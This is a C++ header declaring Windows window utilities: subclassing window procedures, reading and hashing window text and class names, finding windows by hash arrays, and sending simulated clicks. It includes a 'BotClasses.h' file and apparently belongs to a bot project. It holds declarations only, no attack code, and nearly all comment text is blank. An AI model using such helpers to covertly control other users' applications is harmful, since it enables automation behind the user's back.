//---------------------------------------------------------------------------

#ifndef WndUtilsH
#define WndUtilsH
//---------------------------------------------------------------------------

#include <windows.h>
#include "BotClasses.h"

//*************************************************************************
// Subclassing -     ( 
//				 )
//*************************************************************************

//      
typedef PList WNDPROCLIST;

//     
typedef struct TWndProcInfo
{
	HWND    Window;       //      
	bool    IsUnicode;    //  UNICODE 
	WNDPROC OriginalProc; //  

} *PWndProcInfo;



namespace SubClassing
{
	//--------------------------------------------------------------
	//  CreateList -     
	//                 .
	//                   
	//--------------------------------------------------------------
	WNDPROCLIST CreateList();

	//--------------------------------------------------------------
	//  SetWindowProc -     
	//
	//  List  - ,      
	//			 
	//
	//  Wnd -      
	//
	//  NewProc -   
	//
	//  :       
	//                
	//--------------------------------------------------------------
	PWndProcInfo SetWindowProc(WNDPROCLIST List, HWND Wnd, WNDPROC NewProc);


	//--------------------------------------------------------------
	//  RestoreWndProc -   
	//					  
	//
	//  List -   
	//
	//  Wnd -    
	//--------------------------------------------------------------
	void RestoreWndProc(WNDPROCLIST List, HWND Wnd);

	//--------------------------------------------------------------
	//  CallOriginalProc -    
	//                     
	//--------------------------------------------------------------
	LRESULT CallOriginalProc(WNDPROCLIST List, HWND Wnd, UINT Msg, WPARAM WParam, LPARAM LParam);
}



//--------------------------------------------------------------
//  AllocateWND -   
//--------------------------------------------------------------
HWND AllocateWND(WNDPROC WndProc);

//--------------------------------------------------------------
//  GetWNDText -    
//--------------------------------------------------------------
PCHAR  GetWndText(HWND Wnd);
string GetWndText2(HWND Wnd);

//--------------------------------------------------------------
//  GetWndClassName -     
//--------------------------------------------------------------
PCHAR GetWndClassName(HWND Wnd);
string GetWndClassName2(HWND Wnd);


//   
DWORD GetWndTextHash(HWND Wnd, bool LowerChar = false);

//   
DWORD GetWndClassHash(HWND Wnd, bool LowerChar = false);


//---------------------------------------------------
//  SameWndTextToHashArray
//       
//      
//       
//---------------------------------------------------
bool SameWndTextWithHashArray(HWND Wnd, const DWORD* TextHashArray, bool LowerCase);



//--------------------------------------------------------------
//  GetAllWindowsText -      
//                       
//
//  AddClass -   
//
//  AddText -   
//--------------------------------------------------------------
PCHAR GetAllWindowsText(HWND Wnd, bool AddClass, bool AddText);



//--------------------------------------------------------------
//  ClickToWindow -     
//
//  X, Y -   ()
//--------------------------------------------------------------
bool ClickToWindow(HWND Wnd, int X, int Y);
//   ,     
bool HardClickToWindow( HWND wnd, int x, int y );
bool inline ClickToWindow(HWND Wnd) {return ClickToWindow(Wnd, -1, -1);}


//--------------------------------------------------------------
// SetWindowTransparent -    
//--------------------------------------------------------------
void SetWindowTransparent(HWND Wnd, BYTE Transparent);




//*************************************************************************
// WNDFILTER -      
//*************************************************************************
typedef struct TWndFilter
{
	PCHAR ClassName;       //  
	PCHAR Text;            //  
	bool  IsParentWnd;     //     .
	DWORD MaxLevel;        //       
	bool  CaseSensetive;   //    
	TWndFilter *ParentWnd; //   .  , 
						   //      
						   //      

} *PWndFilter;

namespace WNDFILTER
{
	//----------------------------------------------------------
	//  Create -   
	//----------------------------------------------------------
	PWndFilter Create(PCHAR ClassName, PCHAR Text, bool IsParentWnd, DWORD MaxLevel);

	//----------------------------------------------------------
	//  Free -   
	//----------------------------------------------------------
	void Free(PWndFilter Filter);

	//----------------------------------------------------------
	//  Filtrate -      
	//			     
	//----------------------------------------------------------
    bool Filtrate(HWND Wnd, PWndFilter Filter);
}


//---------------------------------------------------------------------------
//     - ,   ParentWnd 
//   - Hashes[0],          . .
//         0,     
HWND FindWndByClassHashArray(HWND ParentWnd, DWORD* Hashes, bool CaseSensetive);



//----------------------------------------------------------
//  GetTopParentWindow -    -
//                        
//----------------------------------------------------------
HWND GetTopParentWindow(HWND Wnd);



#endif
